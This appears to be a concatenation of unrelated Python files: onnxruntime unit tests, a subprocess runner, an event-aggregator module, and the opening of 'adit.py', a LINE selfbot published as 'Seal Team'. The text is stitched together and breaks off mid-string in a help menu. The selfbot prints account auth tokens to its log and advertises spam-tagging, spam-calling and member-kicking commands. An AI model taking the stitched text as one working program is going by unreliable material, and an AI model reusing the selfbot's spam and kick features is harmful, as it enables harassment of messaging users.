        self.assertEqual(cuda_sparse_tensor.device_name(), 'cuda')
        self.assertEqual(cuda_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
        self.assertEqual(cuda_sparse_tensor.dense_shape(), shape)
        self.assertEqual(cuda_sparse_tensor.data_type(), "sparse_tensor(float)")
def testRunModelWithCudaCopyStream(self):
    """Stress test for the race condition of issue #4829 (CUDA copy stream).

    Runs the same model many times; any intermittent failure here indicates
    the copy-stream race has regressed.
    """
    available_providers = onnxrt.get_available_providers()
    if (not 'CUDAExecutionProvider' in available_providers):
        print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
    else:
        # adapted from issue #4829 for a race condition when copy is not on default stream
        # note:
        # 1. if there are intermittent failure in this test, something is wrong
        # 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
        # to repro #4829, set the CUDA EP do_copy_in_default_stream option to False
        providers = [("CUDAExecutionProvider", {"do_copy_in_default_stream": True}), "CPUExecutionProvider"]
        session = onnxrt.InferenceSession(get_name("issue4829.onnx"), providers=providers)
        shape = np.array([2, 2], dtype=np.int64)
        # Many iterations are needed to give the race a chance to surface.
        for iteration in range(100000):
            result = session.run(output_names=['output'], input_feed={'shape': shape})
def testSharedAllocatorUsingCreateAndRegisterAllocator(self):
    """Register an env-level shared arena allocator and create two sessions:
    one that opts in via the "session.use_env_allocators" config entry and
    one that does not.
    """
    # Create and register an arena based allocator
    # ort_arena_cfg = onnxrt.OrtArenaCfg(0, -1, -1, -1) (create an OrtArenaCfg like this template if you want to use non-default parameters)
    ort_memory_info = onnxrt.OrtMemoryInfo("Cpu", onnxrt.OrtAllocatorType.ORT_ARENA_ALLOCATOR, 0, onnxrt.OrtMemType.DEFAULT)
    # Use this option if using non-default OrtArenaCfg : onnxrt.create_and_register_allocator(ort_memory_info, ort_arena_cfg)
    onnxrt.create_and_register_allocator(ort_memory_info, None)

    # Create a session that will use the registered arena based allocator
    so1 = onnxrt.SessionOptions()
    so1.log_severity_level = 1
    # Stray trailing semicolon removed from the original line.
    so1.add_session_config_entry("session.use_env_allocators", "1")
    onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so1, providers=onnxrt.get_available_providers())

    # Create a session that will NOT use the registered arena based allocator
    so2 = onnxrt.SessionOptions()
    so2.log_severity_level = 1
    onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so2, providers=onnxrt.get_available_providers())
def testCheckAndNormalizeProviderArgs(self):
    """Unit-test check_and_normalize_provider_args: valid combinations
    normalize to parallel (providers, options) lists; invalid ones raise
    ValueError; duplicates collapse with a UserWarning."""
    from onnxruntime.capi.onnxruntime_inference_collection import check_and_normalize_provider_args
    valid_providers = ["a", "b", "c"]

    def check_success(providers, provider_options, expected_providers, expected_provider_options):
        # Normalization should produce parallel lists with stringified options.
        actual_providers, actual_provider_options = check_and_normalize_provider_args(
            providers, provider_options, valid_providers)
        self.assertEqual(actual_providers, expected_providers)
        self.assertEqual(actual_provider_options, expected_provider_options)

    check_success(None, None, [], [])
    check_success(["a"], None, ["a"], [{}])
    check_success(["a", "b"], None, ["a", "b"], [{}, {}])
    check_success([("a", {1: 2}), "b"], None, ["a", "b"], [{"1": "2"}, {}])
    check_success(["a", "b"], [{1: 2}, {}], ["a", "b"], [{"1": "2"}, {}])

    # Duplicate provider names warn; the first occurrence's options win.
    with self.assertWarns(UserWarning):
        check_success(["a", "b", "a"], [{"x": 1}, {}, {"y": 2}], ["a", "b"], [{"x": "1"}, {}])

    def check_failure(providers, provider_options):
        with self.assertRaises(ValueError):
            check_and_normalize_provider_args(providers, provider_options, valid_providers)

    # disable this test
    # provider not valid
    #check_failure(["d"], None)

    # providers not sequence
    check_failure(3, None)
    # providers value invalid
    check_failure([3], None)
    # provider_options not sequence
    check_failure(["a"], 3)
    # provider_options value invalid
    check_failure(["a"], ["not dict"])
    # providers and provider_options length mismatch
    check_failure(["a", "b"], [{1: 2}])
    # provider options unsupported mixed specification
    check_failure([("a", {1: 2})], [{3: 4}])
def testRegisterCustomEPsLibrary(self):
    """Create a session backed by an out-of-tree execution provider loaded
    from a shared library via the low-level pybind API."""
    from onnxruntime.capi import _pybind_state as C
    available_eps = C.get_available_providers()
    # skip amd gpu build
    if 'kRocmExecutionProvider' in available_eps:
        return
    if sys.platform.startswith("win"):
        shared_library = 'test_execution_provider.dll'
    elif sys.platform.startswith("darwin"):
        # exclude for macos
        return
    else:
        shared_library = './libtest_execution_provider.so'
    if not os.path.exists(shared_library):
        raise FileNotFoundError("Unable to find '{0}'".format(shared_library))

    this = os.path.dirname(__file__)
    custom_op_model = os.path.join(this, "testdata", "custom_execution_provider_library", "test_model.onnx")
    if not os.path.exists(custom_op_model):
        raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))

    session_options = C.get_default_session_options()
    sess = C.InferenceSession(session_options, custom_op_model, True, True)
    # Initialize with the custom EP, pointing it at the shared library and
    # passing provider options through.
    sess.initialize_session(['my_ep'],
                            [{'shared_lib_path': shared_library,
                              'device_id': '1', 'some_config': 'val'}],
                            set())
    print("Create session with customize execution provider successfully!")
# Run the test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main(verbosity=1)
|
invocation.py | import os
import subprocess
import threading
from mediacrush.config import _cfgi
class Invocation:
    """Run an external command with a timeout on a worker thread.

    Attributes set as the run progresses:
      crashed    -- True if Popen/communicate raised
      exited     -- True once run() finishes
      stdout     -- decoded stdout text (None if the process never ran)
      process    -- the subprocess.Popen object (None if it never started)
      returncode -- exit status (None if the process never started)
    """
    crashed = False
    exited = False
    stdout = None
    process = None
    args = []  # class-level default; always rebound per instance, never mutated

    def __init__(self, command):
        # command is a format string, e.g. "ffmpeg -i {0} {1}"
        self.command = command

    def __call__(self, *args, **kw):
        # Fill in the command template and split it into argv form.
        self.args = self.command.format(*args, **kw).split()
        return self

    def _target(self):
        # Worker body: launch the process and collect its stdout.
        try:
            self.process = subprocess.Popen(
                self.args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
            )
            self.stdout, _ = self.process.communicate()
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # are not swallowed.
            self.crashed = True

    def run(self, timeout=_cfgi("max_processing_time")):
        """Execute the command, terminating it if it exceeds *timeout* seconds."""
        if not self.args:
            self.args = self.command.split()
        thread = threading.Thread(target=self._target)
        thread.start()
        thread.join(timeout)
        if thread.is_alive():
            print("Terminating process")
            self.process.terminate()
            thread.join()
        self.exited = True
        # Guard against the crashed path: the original unconditionally called
        # .decode() on None / read .returncode off None and raised.
        if self.stdout is not None:
            self.stdout = self.stdout.decode("utf-8")
        self.returncode = self.process.returncode if self.process is not None else None
|
events.py | import signal
from threading import Thread
from types import FunctionType
from typing import Any, Callable, Protocol, Union, List
from .globals import PLATFORM
from .utils import isinstancemethod
__all__ = ["Event", "EventListener"]
#
# Types
#
# A consumer receives the emitted payload; a bound consumer additionally
# receives its owning instance (i.e. it is a method).
Consumer = Callable[[Any], None]
BoundConsumer = Callable[[object], None]
class ListeningFunc(Protocol):
    # Structural type of a callable registered via Event.listen: the
    # decorator stamps __threaded__ and __subscribes_to__ onto the function.
    __threaded__: bool
    __subscribes_to__: "Event"
    __call__: Callable
    __name__: str
# ---
class EventListener:
    def __new__(cls, *args, **kwargs):
        r"""
        Scans the new instance for callables marked as event subscribers
        (via ``__subscribes_to__``) and registers each one with its event.
        """
        instance = super().__new__(cls)
        for attr_name in dir(instance):
            member = getattr(instance, attr_name, None)
            if not callable(member):
                continue
            # Event.listen attaches the event object itself, so registration
            # of bound methods can be deferred until instantiation.
            target = getattr(member, '__subscribes_to__', False)
            if target is not False:
                target.subscribers.append(member)
        return instance
class Event:
    # Tuple, not a bare string (a string works only because it is a single
    # name; the tuple form is the conventional spelling).
    __slots__ = ("subscribers",)

    def __init__(self):
        r"""
        An Event Aggregator that allows observers to listen to certain events and observers in
        this specific case are callables.
        """
        self.subscribers: List[ListeningFunc] = []

    def emit(self, *args, **kwargs):
        """Invoke every subscriber; threaded subscribers run on a new Thread."""
        for cb in self.subscribers:
            if cb.__threaded__ is True:
                Thread(target=cb, args=args, kwargs=kwargs).start()
            else:
                # Fixed: the original called `cb(*args, *kwargs)`, which
                # unpacked the keyword-argument *names* as extra positional
                # arguments instead of forwarding the keyword arguments.
                cb(*args, **kwargs)

    @staticmethod
    def listen(event: Union[str, "Event"] = None, threaded: bool = True):
        r"""
        Decorated function can be of any type with the only exception that bound methods must
        subclass under :class:`EventListener`.
        """
        def wrapped(func: ListeningFunc) -> ListeningFunc:
            if isinstance(event, str) or event is None:
                # Resolve by name: look up the upper-cased module-level event.
                name = event or func.__name__
                target_event = globals().get(name.upper(), None)
                if target_event is None or not isinstance(target_event, Event):
                    raise AttributeError(f"cannot find event with name {event}")
            else:
                target_event = event
            if isinstancemethod(func):
                # the event itself is attached to __subscribes_to__ so we actually only
                # subscribe to the event on EventListener.__new__
                func.__subscribes_to__ = target_event
                func.__threaded__ = threaded
            else:
                func.__threaded__ = threaded
                target_event.subscribers.append(func)
            return func
        return wrapped
# Window events
class ON_TERMINATE_EVENT(Event):
    # Terminal event: notify subscribers, then end the process.
    def emit(self, *args, **kwargs):
        # Arguments (e.g. the signal number/frame passed by `signal`) are
        # intentionally dropped; subscribers are invoked with no arguments.
        super().emit()
        exit(0)
# Singleton event instances shared across the application.
ON_TERMINATE = ON_TERMINATE_EVENT()
ON_START = Event()
ON_RESIZE = Event()
# IO
ON_KEY_PRESS = Event()
ON_MOUSE_CLICK = Event()
# Sigint and sigterm signals will start a system termination call
signal.signal(signal.SIGINT, ON_TERMINATE.emit)
signal.signal(signal.SIGTERM, ON_TERMINATE.emit)
#if PLATFORM != "Window":
#    signal.signal(signal.SIGWINCH, ON_TERMINATE.emit)
# Drop names that are not part of the module's public surface.
del ON_TERMINATE_EVENT, PLATFORM
|
adit.py | Seal Team/adit.py /
@Seal Team
Seal Team Update adit.py
Latest commit 762af3e on 29 Oct 2018
History
1 contributor
4312 lines (4064 sloc) 245 KB
# -*- coding: utf-8 -*-
import LINEPY
from LINEPY import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, pafy, time, timeit, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, ctypes, urllib, wikipedia
from datetime import timedelta, date
from datetime import datetime
from bs4 import BeautifulSoup
#import pyimgflip
from googletrans import Translator
import youtube_dl
# --- LINE client bootstrap: primary client, assist client, and channels ---
aditmadzs = LineClient()
#aditmadzs = LineClient(authToken='LOGIN TOKEN')
aditmadzs.log("Auth Token : " + str(aditmadzs.authToken))
channel = LineChannel(aditmadzs)
aditmadzs.log("Channel Access Token : " + str(channel.channelAccessToken))
ki = LineClient()
#ki = LineClient(authToken='LOGIN TOKEN')
ki.log("Auth Token : " + str(ki.authToken))
channel1 = LineChannel(ki)
ki.log("Channel Access Token : " + str(channel1.channelAccessToken))
# Replace the mids inside admin/owner/creator.json with your own mid.
poll = LinePoll(aditmadzs)
call = aditmadzs
# Default privilege lists; overwritten below from the JSON files.
creator = ["U73ef509d545821a556dff2dee4459edf"]
owner = ["U73ef509d545821a556dff2dee4459edf"]
admin = ["U73ef509d545821a556dff2dee4459edf"]
staff = ["U73ef509d545821a556dff2dee4459edf"]
mid = aditmadzs.getProfile().mid
Amid = ki.getProfile().mid
KAC = [aditmadzs, ki]
ABC = [ki]
Bots = [mid, Amid]
Aditmadzs = admin + staff
# Per-group feature toggles (lists of group ids).
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
welcome = []
simisimi = []
translateen = []
translateid = []
translateth = []
translatetw = []
translatear = []
# Snapshot of the bot's own profile.
myProfile = {
    "displayName": "",
    "statusMessage": "",
    "pictureStatus": ""
}
aditProfile = aditmadzs.getProfile()
myProfile["displayName"] = aditProfile.displayName
myProfile["statusMessage"] = aditProfile.statusMessage
myProfile["pictureStatus"] = aditProfile.pictureStatus
responsename1 = ki.getProfile().displayName
# Lurk ("sider") tracking state per group.
cctv = {
    "cyduk": {},
    "point": {},
    "sidermem": {}
}
# Load persisted privilege lists and settings from disk.
with open('creator.json', 'r') as fp:
    creator = json.load(fp)
with open('owner.json', 'r') as fp:
    owner = json.load(fp)
with open('admin.json', 'r') as fp:
    admin = json.load(fp)
Setbot1 = codecs.open("setting.json", "r", "utf-8")
Setmain = json.load(Setbot1)
Setbot2 = codecs.open("settings.json", "r", "utf-8")
settings = json.load(Setbot2)
Setbot3 = codecs.open("wait.json", "r", "utf-8")
wait = json.load(Setbot3)
Setbot4 = codecs.open("read.json", "r", "utf-8")
read = json.load(Setbot4)
# Process start time (for runtime reports) and message logs.
mulai = time.time()
msg_dict = {}
msg_dict1 = {}
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
def download_page(url):
    """Fetch *url* and return the response body as a string.

    On Python 3 uses urllib.request and returns None (after printing the
    error) on failure; on Python 2 falls back to urllib2 and returns
    "Page Not found" on failure.
    """
    version = (3, 0)
    cur_version = sys.version_info
    if cur_version >= version:
        # Fixed: the original wrote `import urllib,request` and
        # `urllib,request.Request(...)` — a comma instead of a dot — so this
        # branch always failed with ImportError/NameError.
        import urllib.request
        try:
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
            req = urllib.request.Request(url, headers=headers)
            resp = urllib.request.urlopen(req)
            respData = str(resp.read())
            return respData
        except Exception as e:
            print(str(e))
    else:
        import urllib2
        try:
            headers = {}
            headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
            req = urllib2.Request(url, headers=headers)
            response = urllib2.urlopen(req)
            page = response.read()
            return page
        except Exception:
            return "Page Not found"
def cTime_to_datetime(unixtime):
    """Convert a millisecond epoch timestamp to a naive local datetime."""
    digits = str(unixtime)
    # Dropping the last three digits discards the millisecond component.
    return datetime.fromtimestamp(int(digits[:-3]))
def dt_to_str(dt):
    """Render a datetime as an HH:MM:SS string."""
    return format(dt, '%H:%M:%S')
def delete_log():
    """Delete logged messages older than 24 hours from msg_dict.

    Fixes three bugs in the original: `datetime.timedelta(1)` raised
    AttributeError (datetime here is the class, not the module), the delete
    referenced an undefined `msg_id`, and entries were deleted from the dict
    while iterating it.
    """
    now = datetime.utcnow()
    # Iterate over a snapshot so deletion during the loop is safe.
    for key in list(msg_dict):
        # createdTime is in milliseconds; cTime_to_datetime strips them.
        if (now - cTime_to_datetime(msg_dict[key]["createdTime"])) > timedelta(1):
            del msg_dict[key]
def atend():
    """Persist the in-memory message log to Log_data.json on shutdown."""
    print("Saving")
    with open("Log_data.json", "w", encoding='utf8') as log_file:
        json.dump(msg_dict, log_file, ensure_ascii=False, indent=4,
                  separators=(',', ': '))
    print("BYE")
def _images_get_all_items(page):
    """Collect every image item parsed out of *page* until the sentinel
    "no_links" is returned by _images_get_next_item."""
    collected = []
    while True:
        item, end_content = _images_get_next_item(page)
        if item == "no_links":
            break
        collected.append(item)
        # Brief pause between parses, as in the original scraper.
        time.sleep(0.1)
        # Continue scanning from just past the item we consumed.
        page = page[end_content:]
    return collected
def backupData():
    """Write the in-memory settings dicts back to their JSON files.

    Returns True on success; on failure logs the error and returns False.
    The original opened four codecs handles and never closed any of them;
    `with` guarantees each file is flushed and closed.
    """
    try:
        for path, data in (('setting.json', Setmain),
                           ('settings.json', settings),
                           ('wait.json', wait),
                           ('read.json', read)):
            with codecs.open(path, 'w', 'utf-8') as f:
                json.dump(data, f, sort_keys=True, indent=4, ensure_ascii=False)
        return True
    except Exception as error:
        logError(error)
        return False
def restartBot():
    """Persist state, then replace this process with a fresh interpreter
    running the same script (os.execl never returns)."""
    backupData()
    python = sys.executable
    os.execl(python, python, *sys.argv)
def waktu(secs):
    """Format a duration in seconds as 'DD Hari HH Jam MM Menit SS Detik'."""
    days, remainder = divmod(secs, 86400)
    hours, remainder = divmod(remainder, 3600)
    mins, secs = divmod(remainder, 60)
    return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
    """Format an uptime in seconds as 'DD Hari HH Jam MM Menit SS Detik'.

    Duplicate of waktu(); kept as an independent function so either can be
    changed without affecting the other call sites.
    """
    total_mins, out_secs = divmod(secs, 60)
    total_hours, out_mins = divmod(total_mins, 60)
    out_days, out_hours = divmod(total_hours, 24)
    return '%02d Hari %02d Jam %02d Menit %02d Detik' % (
        out_days, out_hours, out_mins, out_secs)
def mentionMembers(to, mid):
    """Send one numbered @-mention message tagging every user in *mid* to chat *to*.

    LINE encodes mentions as character offsets (S/E) into the message text,
    delivered as MENTIONEES metadata alongside the text.
    """
    try:
        arrData = ""
        textx = "Total Mention User「{}」\n\n [ Mention ]\n1. ".format(str(len(mid)))
        arr = []
        no = 1
        num = 2
        for i in mid:
            mention = "@x\n"
            # Offsets of the placeholder within the accumulated text.
            slen = str(len(textx))
            elen = str(len(textx) + len(mention) - 1)
            arrData = {'S': slen, 'E': elen, 'M': i}
            arr.append(arrData)
            textx += mention
            if no < len(mid):
                no += 1
                textx += "%i. " % (num)
                num = (num + 1)
            else:
                # NOTE(review): this footer string is built but never appended
                # to textx — looks like leftover code; confirm before relying on it.
                try:
                    no = "\n┗━━[ {} ]".format(str(aditmadzs.getGroup(to).name))
                except:
                    no = "\n┗━━[ Success ]"
        aditmadzs.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
    except Exception as error:
        aditmadzs.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
    """Send an @-mention message calling out lurkers ("siders") in chat *to*.

    Same offset-based mention encoding as mentionMembers; each mention is
    followed by the configured wait["mention"] text.
    """
    try:
        arrData = ""
        textx = "Total Sider User「{}」\nHaii ".format(str(len(mid)))
        arr = []
        no = 1
        num = 2
        for i in mid:
            mention = "@x\n"
            # Offsets of the placeholder within the accumulated text.
            slen = str(len(textx))
            elen = str(len(textx) + len(mention) - 1)
            arrData = {'S': slen, 'E': elen, 'M': i}
            arr.append(arrData)
            textx += mention + wait["mention"]
            if no < len(mid):
                no += 1
                textx += "%i. " % (num)
                num = (num + 1)
            else:
                # NOTE(review): footer computed but never appended — leftover code?
                try:
                    no = "\n┗━━[ {} ]".format(str(aditmadzs.getGroup(to).name))
                except:
                    no = "\n┗━━[ Success ]"
        aditmadzs.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
    except Exception as error:
        aditmadzs.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def welcomeMembers(to, mid):
    """Greet newly joined members of group *to* with an @-mention message.

    Appends the configured wait["welcome"] text and the group name after
    each mention placeholder.
    """
    try:
        arrData = ""
        textx = "Total Member Masuk「{}」\nHaii ".format(str(len(mid)))
        arr = []
        no = 1
        num = 2
        for i in mid:
            # NOTE(review): group info is re-fetched on every iteration;
            # hoisting it out of the loop would avoid repeated API calls.
            ginfo = aditmadzs.getGroup(to)
            mention = "@x\n"
            slen = str(len(textx))
            elen = str(len(textx) + len(mention) - 1)
            arrData = {'S': slen, 'E': elen, 'M': i}
            arr.append(arrData)
            textx += mention + wait["welcome"] + "\nDi group " + str(ginfo.name)
            if no < len(mid):
                no += 1
                textx += "%i " % (num)
                num = (num + 1)
            else:
                # NOTE(review): footer computed but never appended — leftover code?
                try:
                    no = "\n┗━━[ {} ]".format(str(aditmadzs.getGroup(to).name))
                except:
                    no = "\n┗━━[ Success ]"
        aditmadzs.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
    except Exception as error:
        aditmadzs.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def leaveMembers(to, mid):
    """Announce members leaving group *to* with an @-mention message.

    Appends the configured wait["leave"] text and the group name after each
    mention placeholder.
    """
    try:
        arrData = ""
        textx = "Total Member Keluar「{}」\nByee ".format(str(len(mid)))
        arr = []
        no = 1
        num = 2
        for i in mid:
            # NOTE(review): group info re-fetched per iteration (see welcomeMembers).
            ginfo = aditmadzs.getGroup(to)
            mention = "@x\n"
            slen = str(len(textx))
            elen = str(len(textx) + len(mention) - 1)
            arrData = {'S': slen, 'E': elen, 'M': i}
            arr.append(arrData)
            textx += mention + wait["leave"] + "\nDari group " + str(ginfo.name)
            if no < len(mid):
                no += 1
                textx += "%i " % (num)
                num = (num + 1)
            else:
                # NOTE(review): footer computed but never appended — leftover code?
                try:
                    no = "\n┗━━[ {} ]".format(str(aditmadzs.getGroup(to).name))
                except:
                    no = "\n┗━━[ Success ]"
        aditmadzs.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
    except Exception as error:
        aditmadzs.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention(to, mid, firstmessage):
    """Send *firstmessage* plus a single mention of *mid* and a status report
    (time, group/friend counts, date, uptime) to chat *to*."""
    try:
        arrData = ""
        text = "%s " % (str(firstmessage))
        arr = []
        mention = "@x \n"
        # Offsets of the single mention placeholder within the text.
        slen = str(len(text))
        elen = str(len(text) + len(mention) - 1)
        arrData = {'S': slen, 'E': elen, 'M': mid}
        arr.append(arrData)
        # NOTE(review): `hari` (days until 2018-03-01) is computed but unused.
        today = datetime.today()
        future = datetime(2018, 3, 1)
        hari = (str(future - today))
        comma = hari.find(",")
        hari = hari[:comma]
        teman = aditmadzs.getAllContactIds()
        gid = aditmadzs.getGroupIdsJoined()
        tz = pytz.timezone("Asia/Jakarta")
        timeNow = datetime.now(tz=tz)
        # Uptime since module load (`mulai`).
        eltime = time.time() - mulai
        bot = runtime(eltime)
        text += mention + "◐ Jam : " + datetime.strftime(timeNow, '%H:%M:%S') + " Wib\n🐚 Group : " + str(len(gid)) + "\n🐚 Teman : " + str(len(teman)) + "\n🐚 Tanggal : " + datetime.strftime(timeNow, '%Y-%m-%d') + "\n🐚 Runtime : \n • " + bot
        aditmadzs.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
    except Exception as error:
        aditmadzs.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def command(text):
    """Return *text* lower-cased with the configured command prefix removed,
    or the sentinel "command" when the prefix is absent."""
    lowered = text.lower()
    prefix = Setmain["keyCommand"]
    return lowered.replace(prefix, "") if lowered.startswith(prefix) else "command"
def help():
    """Return the main command-menu text, prefixed with the current command key.

    NOTE: shadows the builtin help() within this module.
    """
    key = Setmain["keyCommand"]
    key = key.title()
    helpMessage = "╔════════════════════╗" + "\n" + \
        " ◄]·✪SEAL TEAM✪·[►" + "\n" + \
        "╚════════════════════╝" + "\n" + \
        "╔════════════════════╗" + "\n" + \
        " ◄]·✪·MENU·✪·[►" + "\n" + \
        "╠════════════════════╝" + "\n" + \
        "╠❂➣ " + key + "Yardım\n" + \
        "╠❂➣ " + key + "Help bot\n" + \
        "╠❂➣ " + key + "Translate\n" + \
        "╠❂➣ " + key + "Meme\n" + \
        "╠❂➣ " + key + "Me\n" + \
        "╠❂➣ " + key + "Mymid\n" + \
        "╠❂➣ " + key + "Mid「@」\n" + \
        "╠❂➣ " + key + "Info 「@」\n" + \
        "╠❂➣ " + key + "Kick1 「@」\n" + \
        "╠❂➣ " + key + "Mybot\n" + \
        "╠❂➣ " + key + "Status\n" + \
        "╠❂➣ " + key + "Status translate\n" + \
        "╠❂➣ " + key + "About\n" + \
        "╠❂➣ " + key + "Restart\n" + \
        "╠❂➣ " + key + "Runtime\n" + \
        "╠❂➣ " + key + "Creator\n" + \
        "╠❂➣ " + key + "Respon\n" + \
        "╠❂➣ " + key + "Speed/Sp\n" + \
        "╠❂➣ " + key + "Sprespon\n" + \
        "╠❂➣ " + key + "Mention\n" + \
        "╠❂➣ " + key + "join dit\n" + \
        "╠❂➣ " + key + "Assist join\n" + \
        "╠❂➣ " + key + "Ginfo\n" + \
        "╠❂➣ " + key + "Open\n" + \
        "╠❂➣ " + key + "Close\n" + \
        "╠❂➣ " + key + "Url grup\n" + \
        "╠❂➣ " + key + "Reject\n" + \
        "╠❂➣ " + key + "Gruplist\n" + \
        "╠❂➣ " + key + "Infogrup「angka」\n" + \
        "╠❂➣ " + key + "Infomem「angka」\n" + \
        "╠❂➣ " + key + "Lurking「on/off」\n" + \
        "╠❂➣ " + key + "Lurkers\n" + \
        "╠❂➣ " + key + "Sider「on/off」\n" + \
        "╠❂➣ " + key + "Updatefoto\n" + \
        "╠❂➣ " + key + "Updategrup\n" + \
        "╠❂➣ " + key + "Updatebot\n" + \
        "╠❂➣ " + key + "Broadcast:「Text」\n" + \
        "╠❂➣ " + key + "Setkey「New Key」\n" + \
        "╠❂➣ " + key + "Mykey\n" + \
        "╠❂➣ " + key + "Resetkey\n" + \
        "╠════════════════════╗" + "\n" + \
        " ◄]·✪·Eğlence·✪·[►" + "\n" + \
        "╠════════════════════╝" + "\n" + \
        "╠❂➣ " + key + "Musik:「Judul Lagu」\n" + \
        "╠❂➣ " + key + "Musik2:「Judul Lagu」\n" + \
        "╠❂➣ " + key + "Playlist「Nama Penyanyi」\n" + \
        "╠❂➣ " + key + "Ytmp3:「Judul Lagu」\n" + \
        "╠❂➣ " + key + "Ytmp4:「Judul Video\n" + \
        "╠❂➣ " + key + "Meme@Nama@Teks1@Teks2\n" + \
        "╠❂➣ " + key + "1cak\n" + \
        "╠❂➣ " + key + "Profilesmule:「ID Smule」\n" + \
        "╠❂➣ " + key + "Randomnumber:「Nmor-Nmor」\n" + \
        "╠❂➣ " + key + "Gimage:「Keyword」\n" + \
        "╠❂➣ " + key + "Img food:「Nama Makanan」\n" + \
        "╠❂➣ " + key + "Cekig:「ID IG」\n" + \
        "╠❂➣ " + key + "Profileig:「Nama IG」\n" + \
        "╠❂➣ " + key + "Cekdate:「tgl-bln-thn」\n" + \
        "╠❂➣ " + key + "Spamtag:「jumlahnya」\n" + \
        "╠❂➣ " + key + "Spamtag「@」\n" + \
        "╠❂➣ " + key + "Spamcall:「jumlahnya」\n" + \
        "╠❂➣ " + key + "Spamcall\n" + \
        "╠════════════════════╗" + "\n" + \
        " ◄]·✪·KORUMA·✪·[►" + "\n" + \
        "╠════════════════════╝" + "\n" + \
        "╠❂➣ " + key + "Notag「on/off」\n" + \
        "╠❂➣ " + key + "Allpro「on/off」\n" + \
        "╠❂➣ " + key + "Protecturl「on/off」\n" + \
        "╠❂➣ " + key + "Protectjoin「on/off」\n" + \
        "╠❂➣ " + key + "Protectkick「on/off」\n" + \
        "╠❂➣ " + key + "Protectcancel「on/off」\n" + \
        "╠❂➣ " + key + "Protectinvite「on/off」\n" + \
        "╠════════════════════╗" + "\n" + \
        " ◄]·✪·AYARLAR·✪·[►" + "\n" + \
        "╠════════════════════╝" + "\n" + \
        "╠❂➣ " + key + "Unsend「on/off」\n" + \
        "╠❂➣ " + key + "Jointicket「on/off」\n" + \
        "╠❂➣ " + key + "Sticker「on/off」\n" + \
        "╠❂➣ " + key + "Respon「on/off」\n" + \
        "╠❂➣ " + key + "Respongift「on/off」\n" + \
        "╠❂➣ " + key + "Contact「on/off」\n" + \
        "╠❂➣ " + key + "Autojoin「on/off」\n" + \
        "╠❂➣ " + key + "Autoadd「on/off」\n" + \
        "╠❂➣ " + key + "Hoş Geldiniz「on/off」\n" + \
        "╠❂➣ " + key + "Simi「on/off」\n" + \
        "╠❂➣ " + key + "Autoleave「on/off」\n" + \
        "╠══════════════════════════════╗" + "\n" + \
        " ◄]·✪·Admin·✪·[►" + "\n" + \
        "╠══════════════════════════════╝" + "\n" + \
        "╠❂➣ " + key + "Admin:on\n" + \
        "╠❂➣ " + key + "Admin:delete\n" + \
        "╠❂➣ " + key + "Staff:on\n" + \
        "╠❂➣ " + key + "Staff:delete\n" + \
        "╠❂➣ " + key + "Bot:on\n" + \
        "╠❂➣ " + key + "Bot:delete\n" + \
        "╠❂➣ " + key + "Adminadd「@」\n" + \
        "╠❂➣ " + key + "Admindell「@」\n" + \
        "╠❂➣ " + key + "Staffadd「@」\n" + \
        "╠❂➣ " + key + "Staffdell「@」\n" + \
        "╠❂➣ " + key + "Botadd「@」\n" + \
        "╠❂➣ " + key + "Botdell「@」\n" + \
        "╠❂➣ " + key + "Refresh\n" + \
        "╠❂➣ " + key + "Listbot\n" + \
        "╠❂➣ " + key + "Listadmin\n" + \
        "╠❂➣ " + key + "Listprotect\n" + \
        "╠❂➣ Ketik「 Refresh 」Jika Sudah\n╠❂➣ Menggunakan Command Diatas...\n" + \
        "╠════════════════════╗" + "\n" + \
        " ◄]·✪ALBAYRAK✪·[►" + "\n" + \
        "╠════════════════════╝" + "\n" + \
        "╠════════════════════╗" + "\n" + \
        "◄]·✪line.me/ti/p/~adit_cmct✪·[►" + "\n" + \
        "╚════════════════════╝"
    return helpMessage
def helpbot():
    """Return the bot-administration command menu text, prefixed with the
    current command key."""
    key = Setmain["keyCommand"]
    key = key.title()
    helpMessage1 = "╔════════════════════╗" + "\n" + \
        " 🍁🍁🍁 SEAL TEAM 🍁🍁🍁" + "\n" + \
        "╚════════════════════╝" + "\n" + \
        "╔════════════════════╗" + "\n" + \
        " ◄]·✪·BOT·✪·[►" + "\n" + \
        "╠════════════════════╝" + "\n" + \
        "╠❂➣ " + key + "Mytoken\n" + \
        "╠❂➣ " + key + "Cek sider\n" + \
        "╠❂➣ " + key + "Cek spam\n" + \
        "╠❂➣ " + key + "Cek pesan\n" + \
        "╠❂➣ " + key + "Cek respon\n" + \
        "╠❂➣ " + key + "Cek welcome\n" + \
        "╠❂➣ " + key + "Cek leave\n" + \
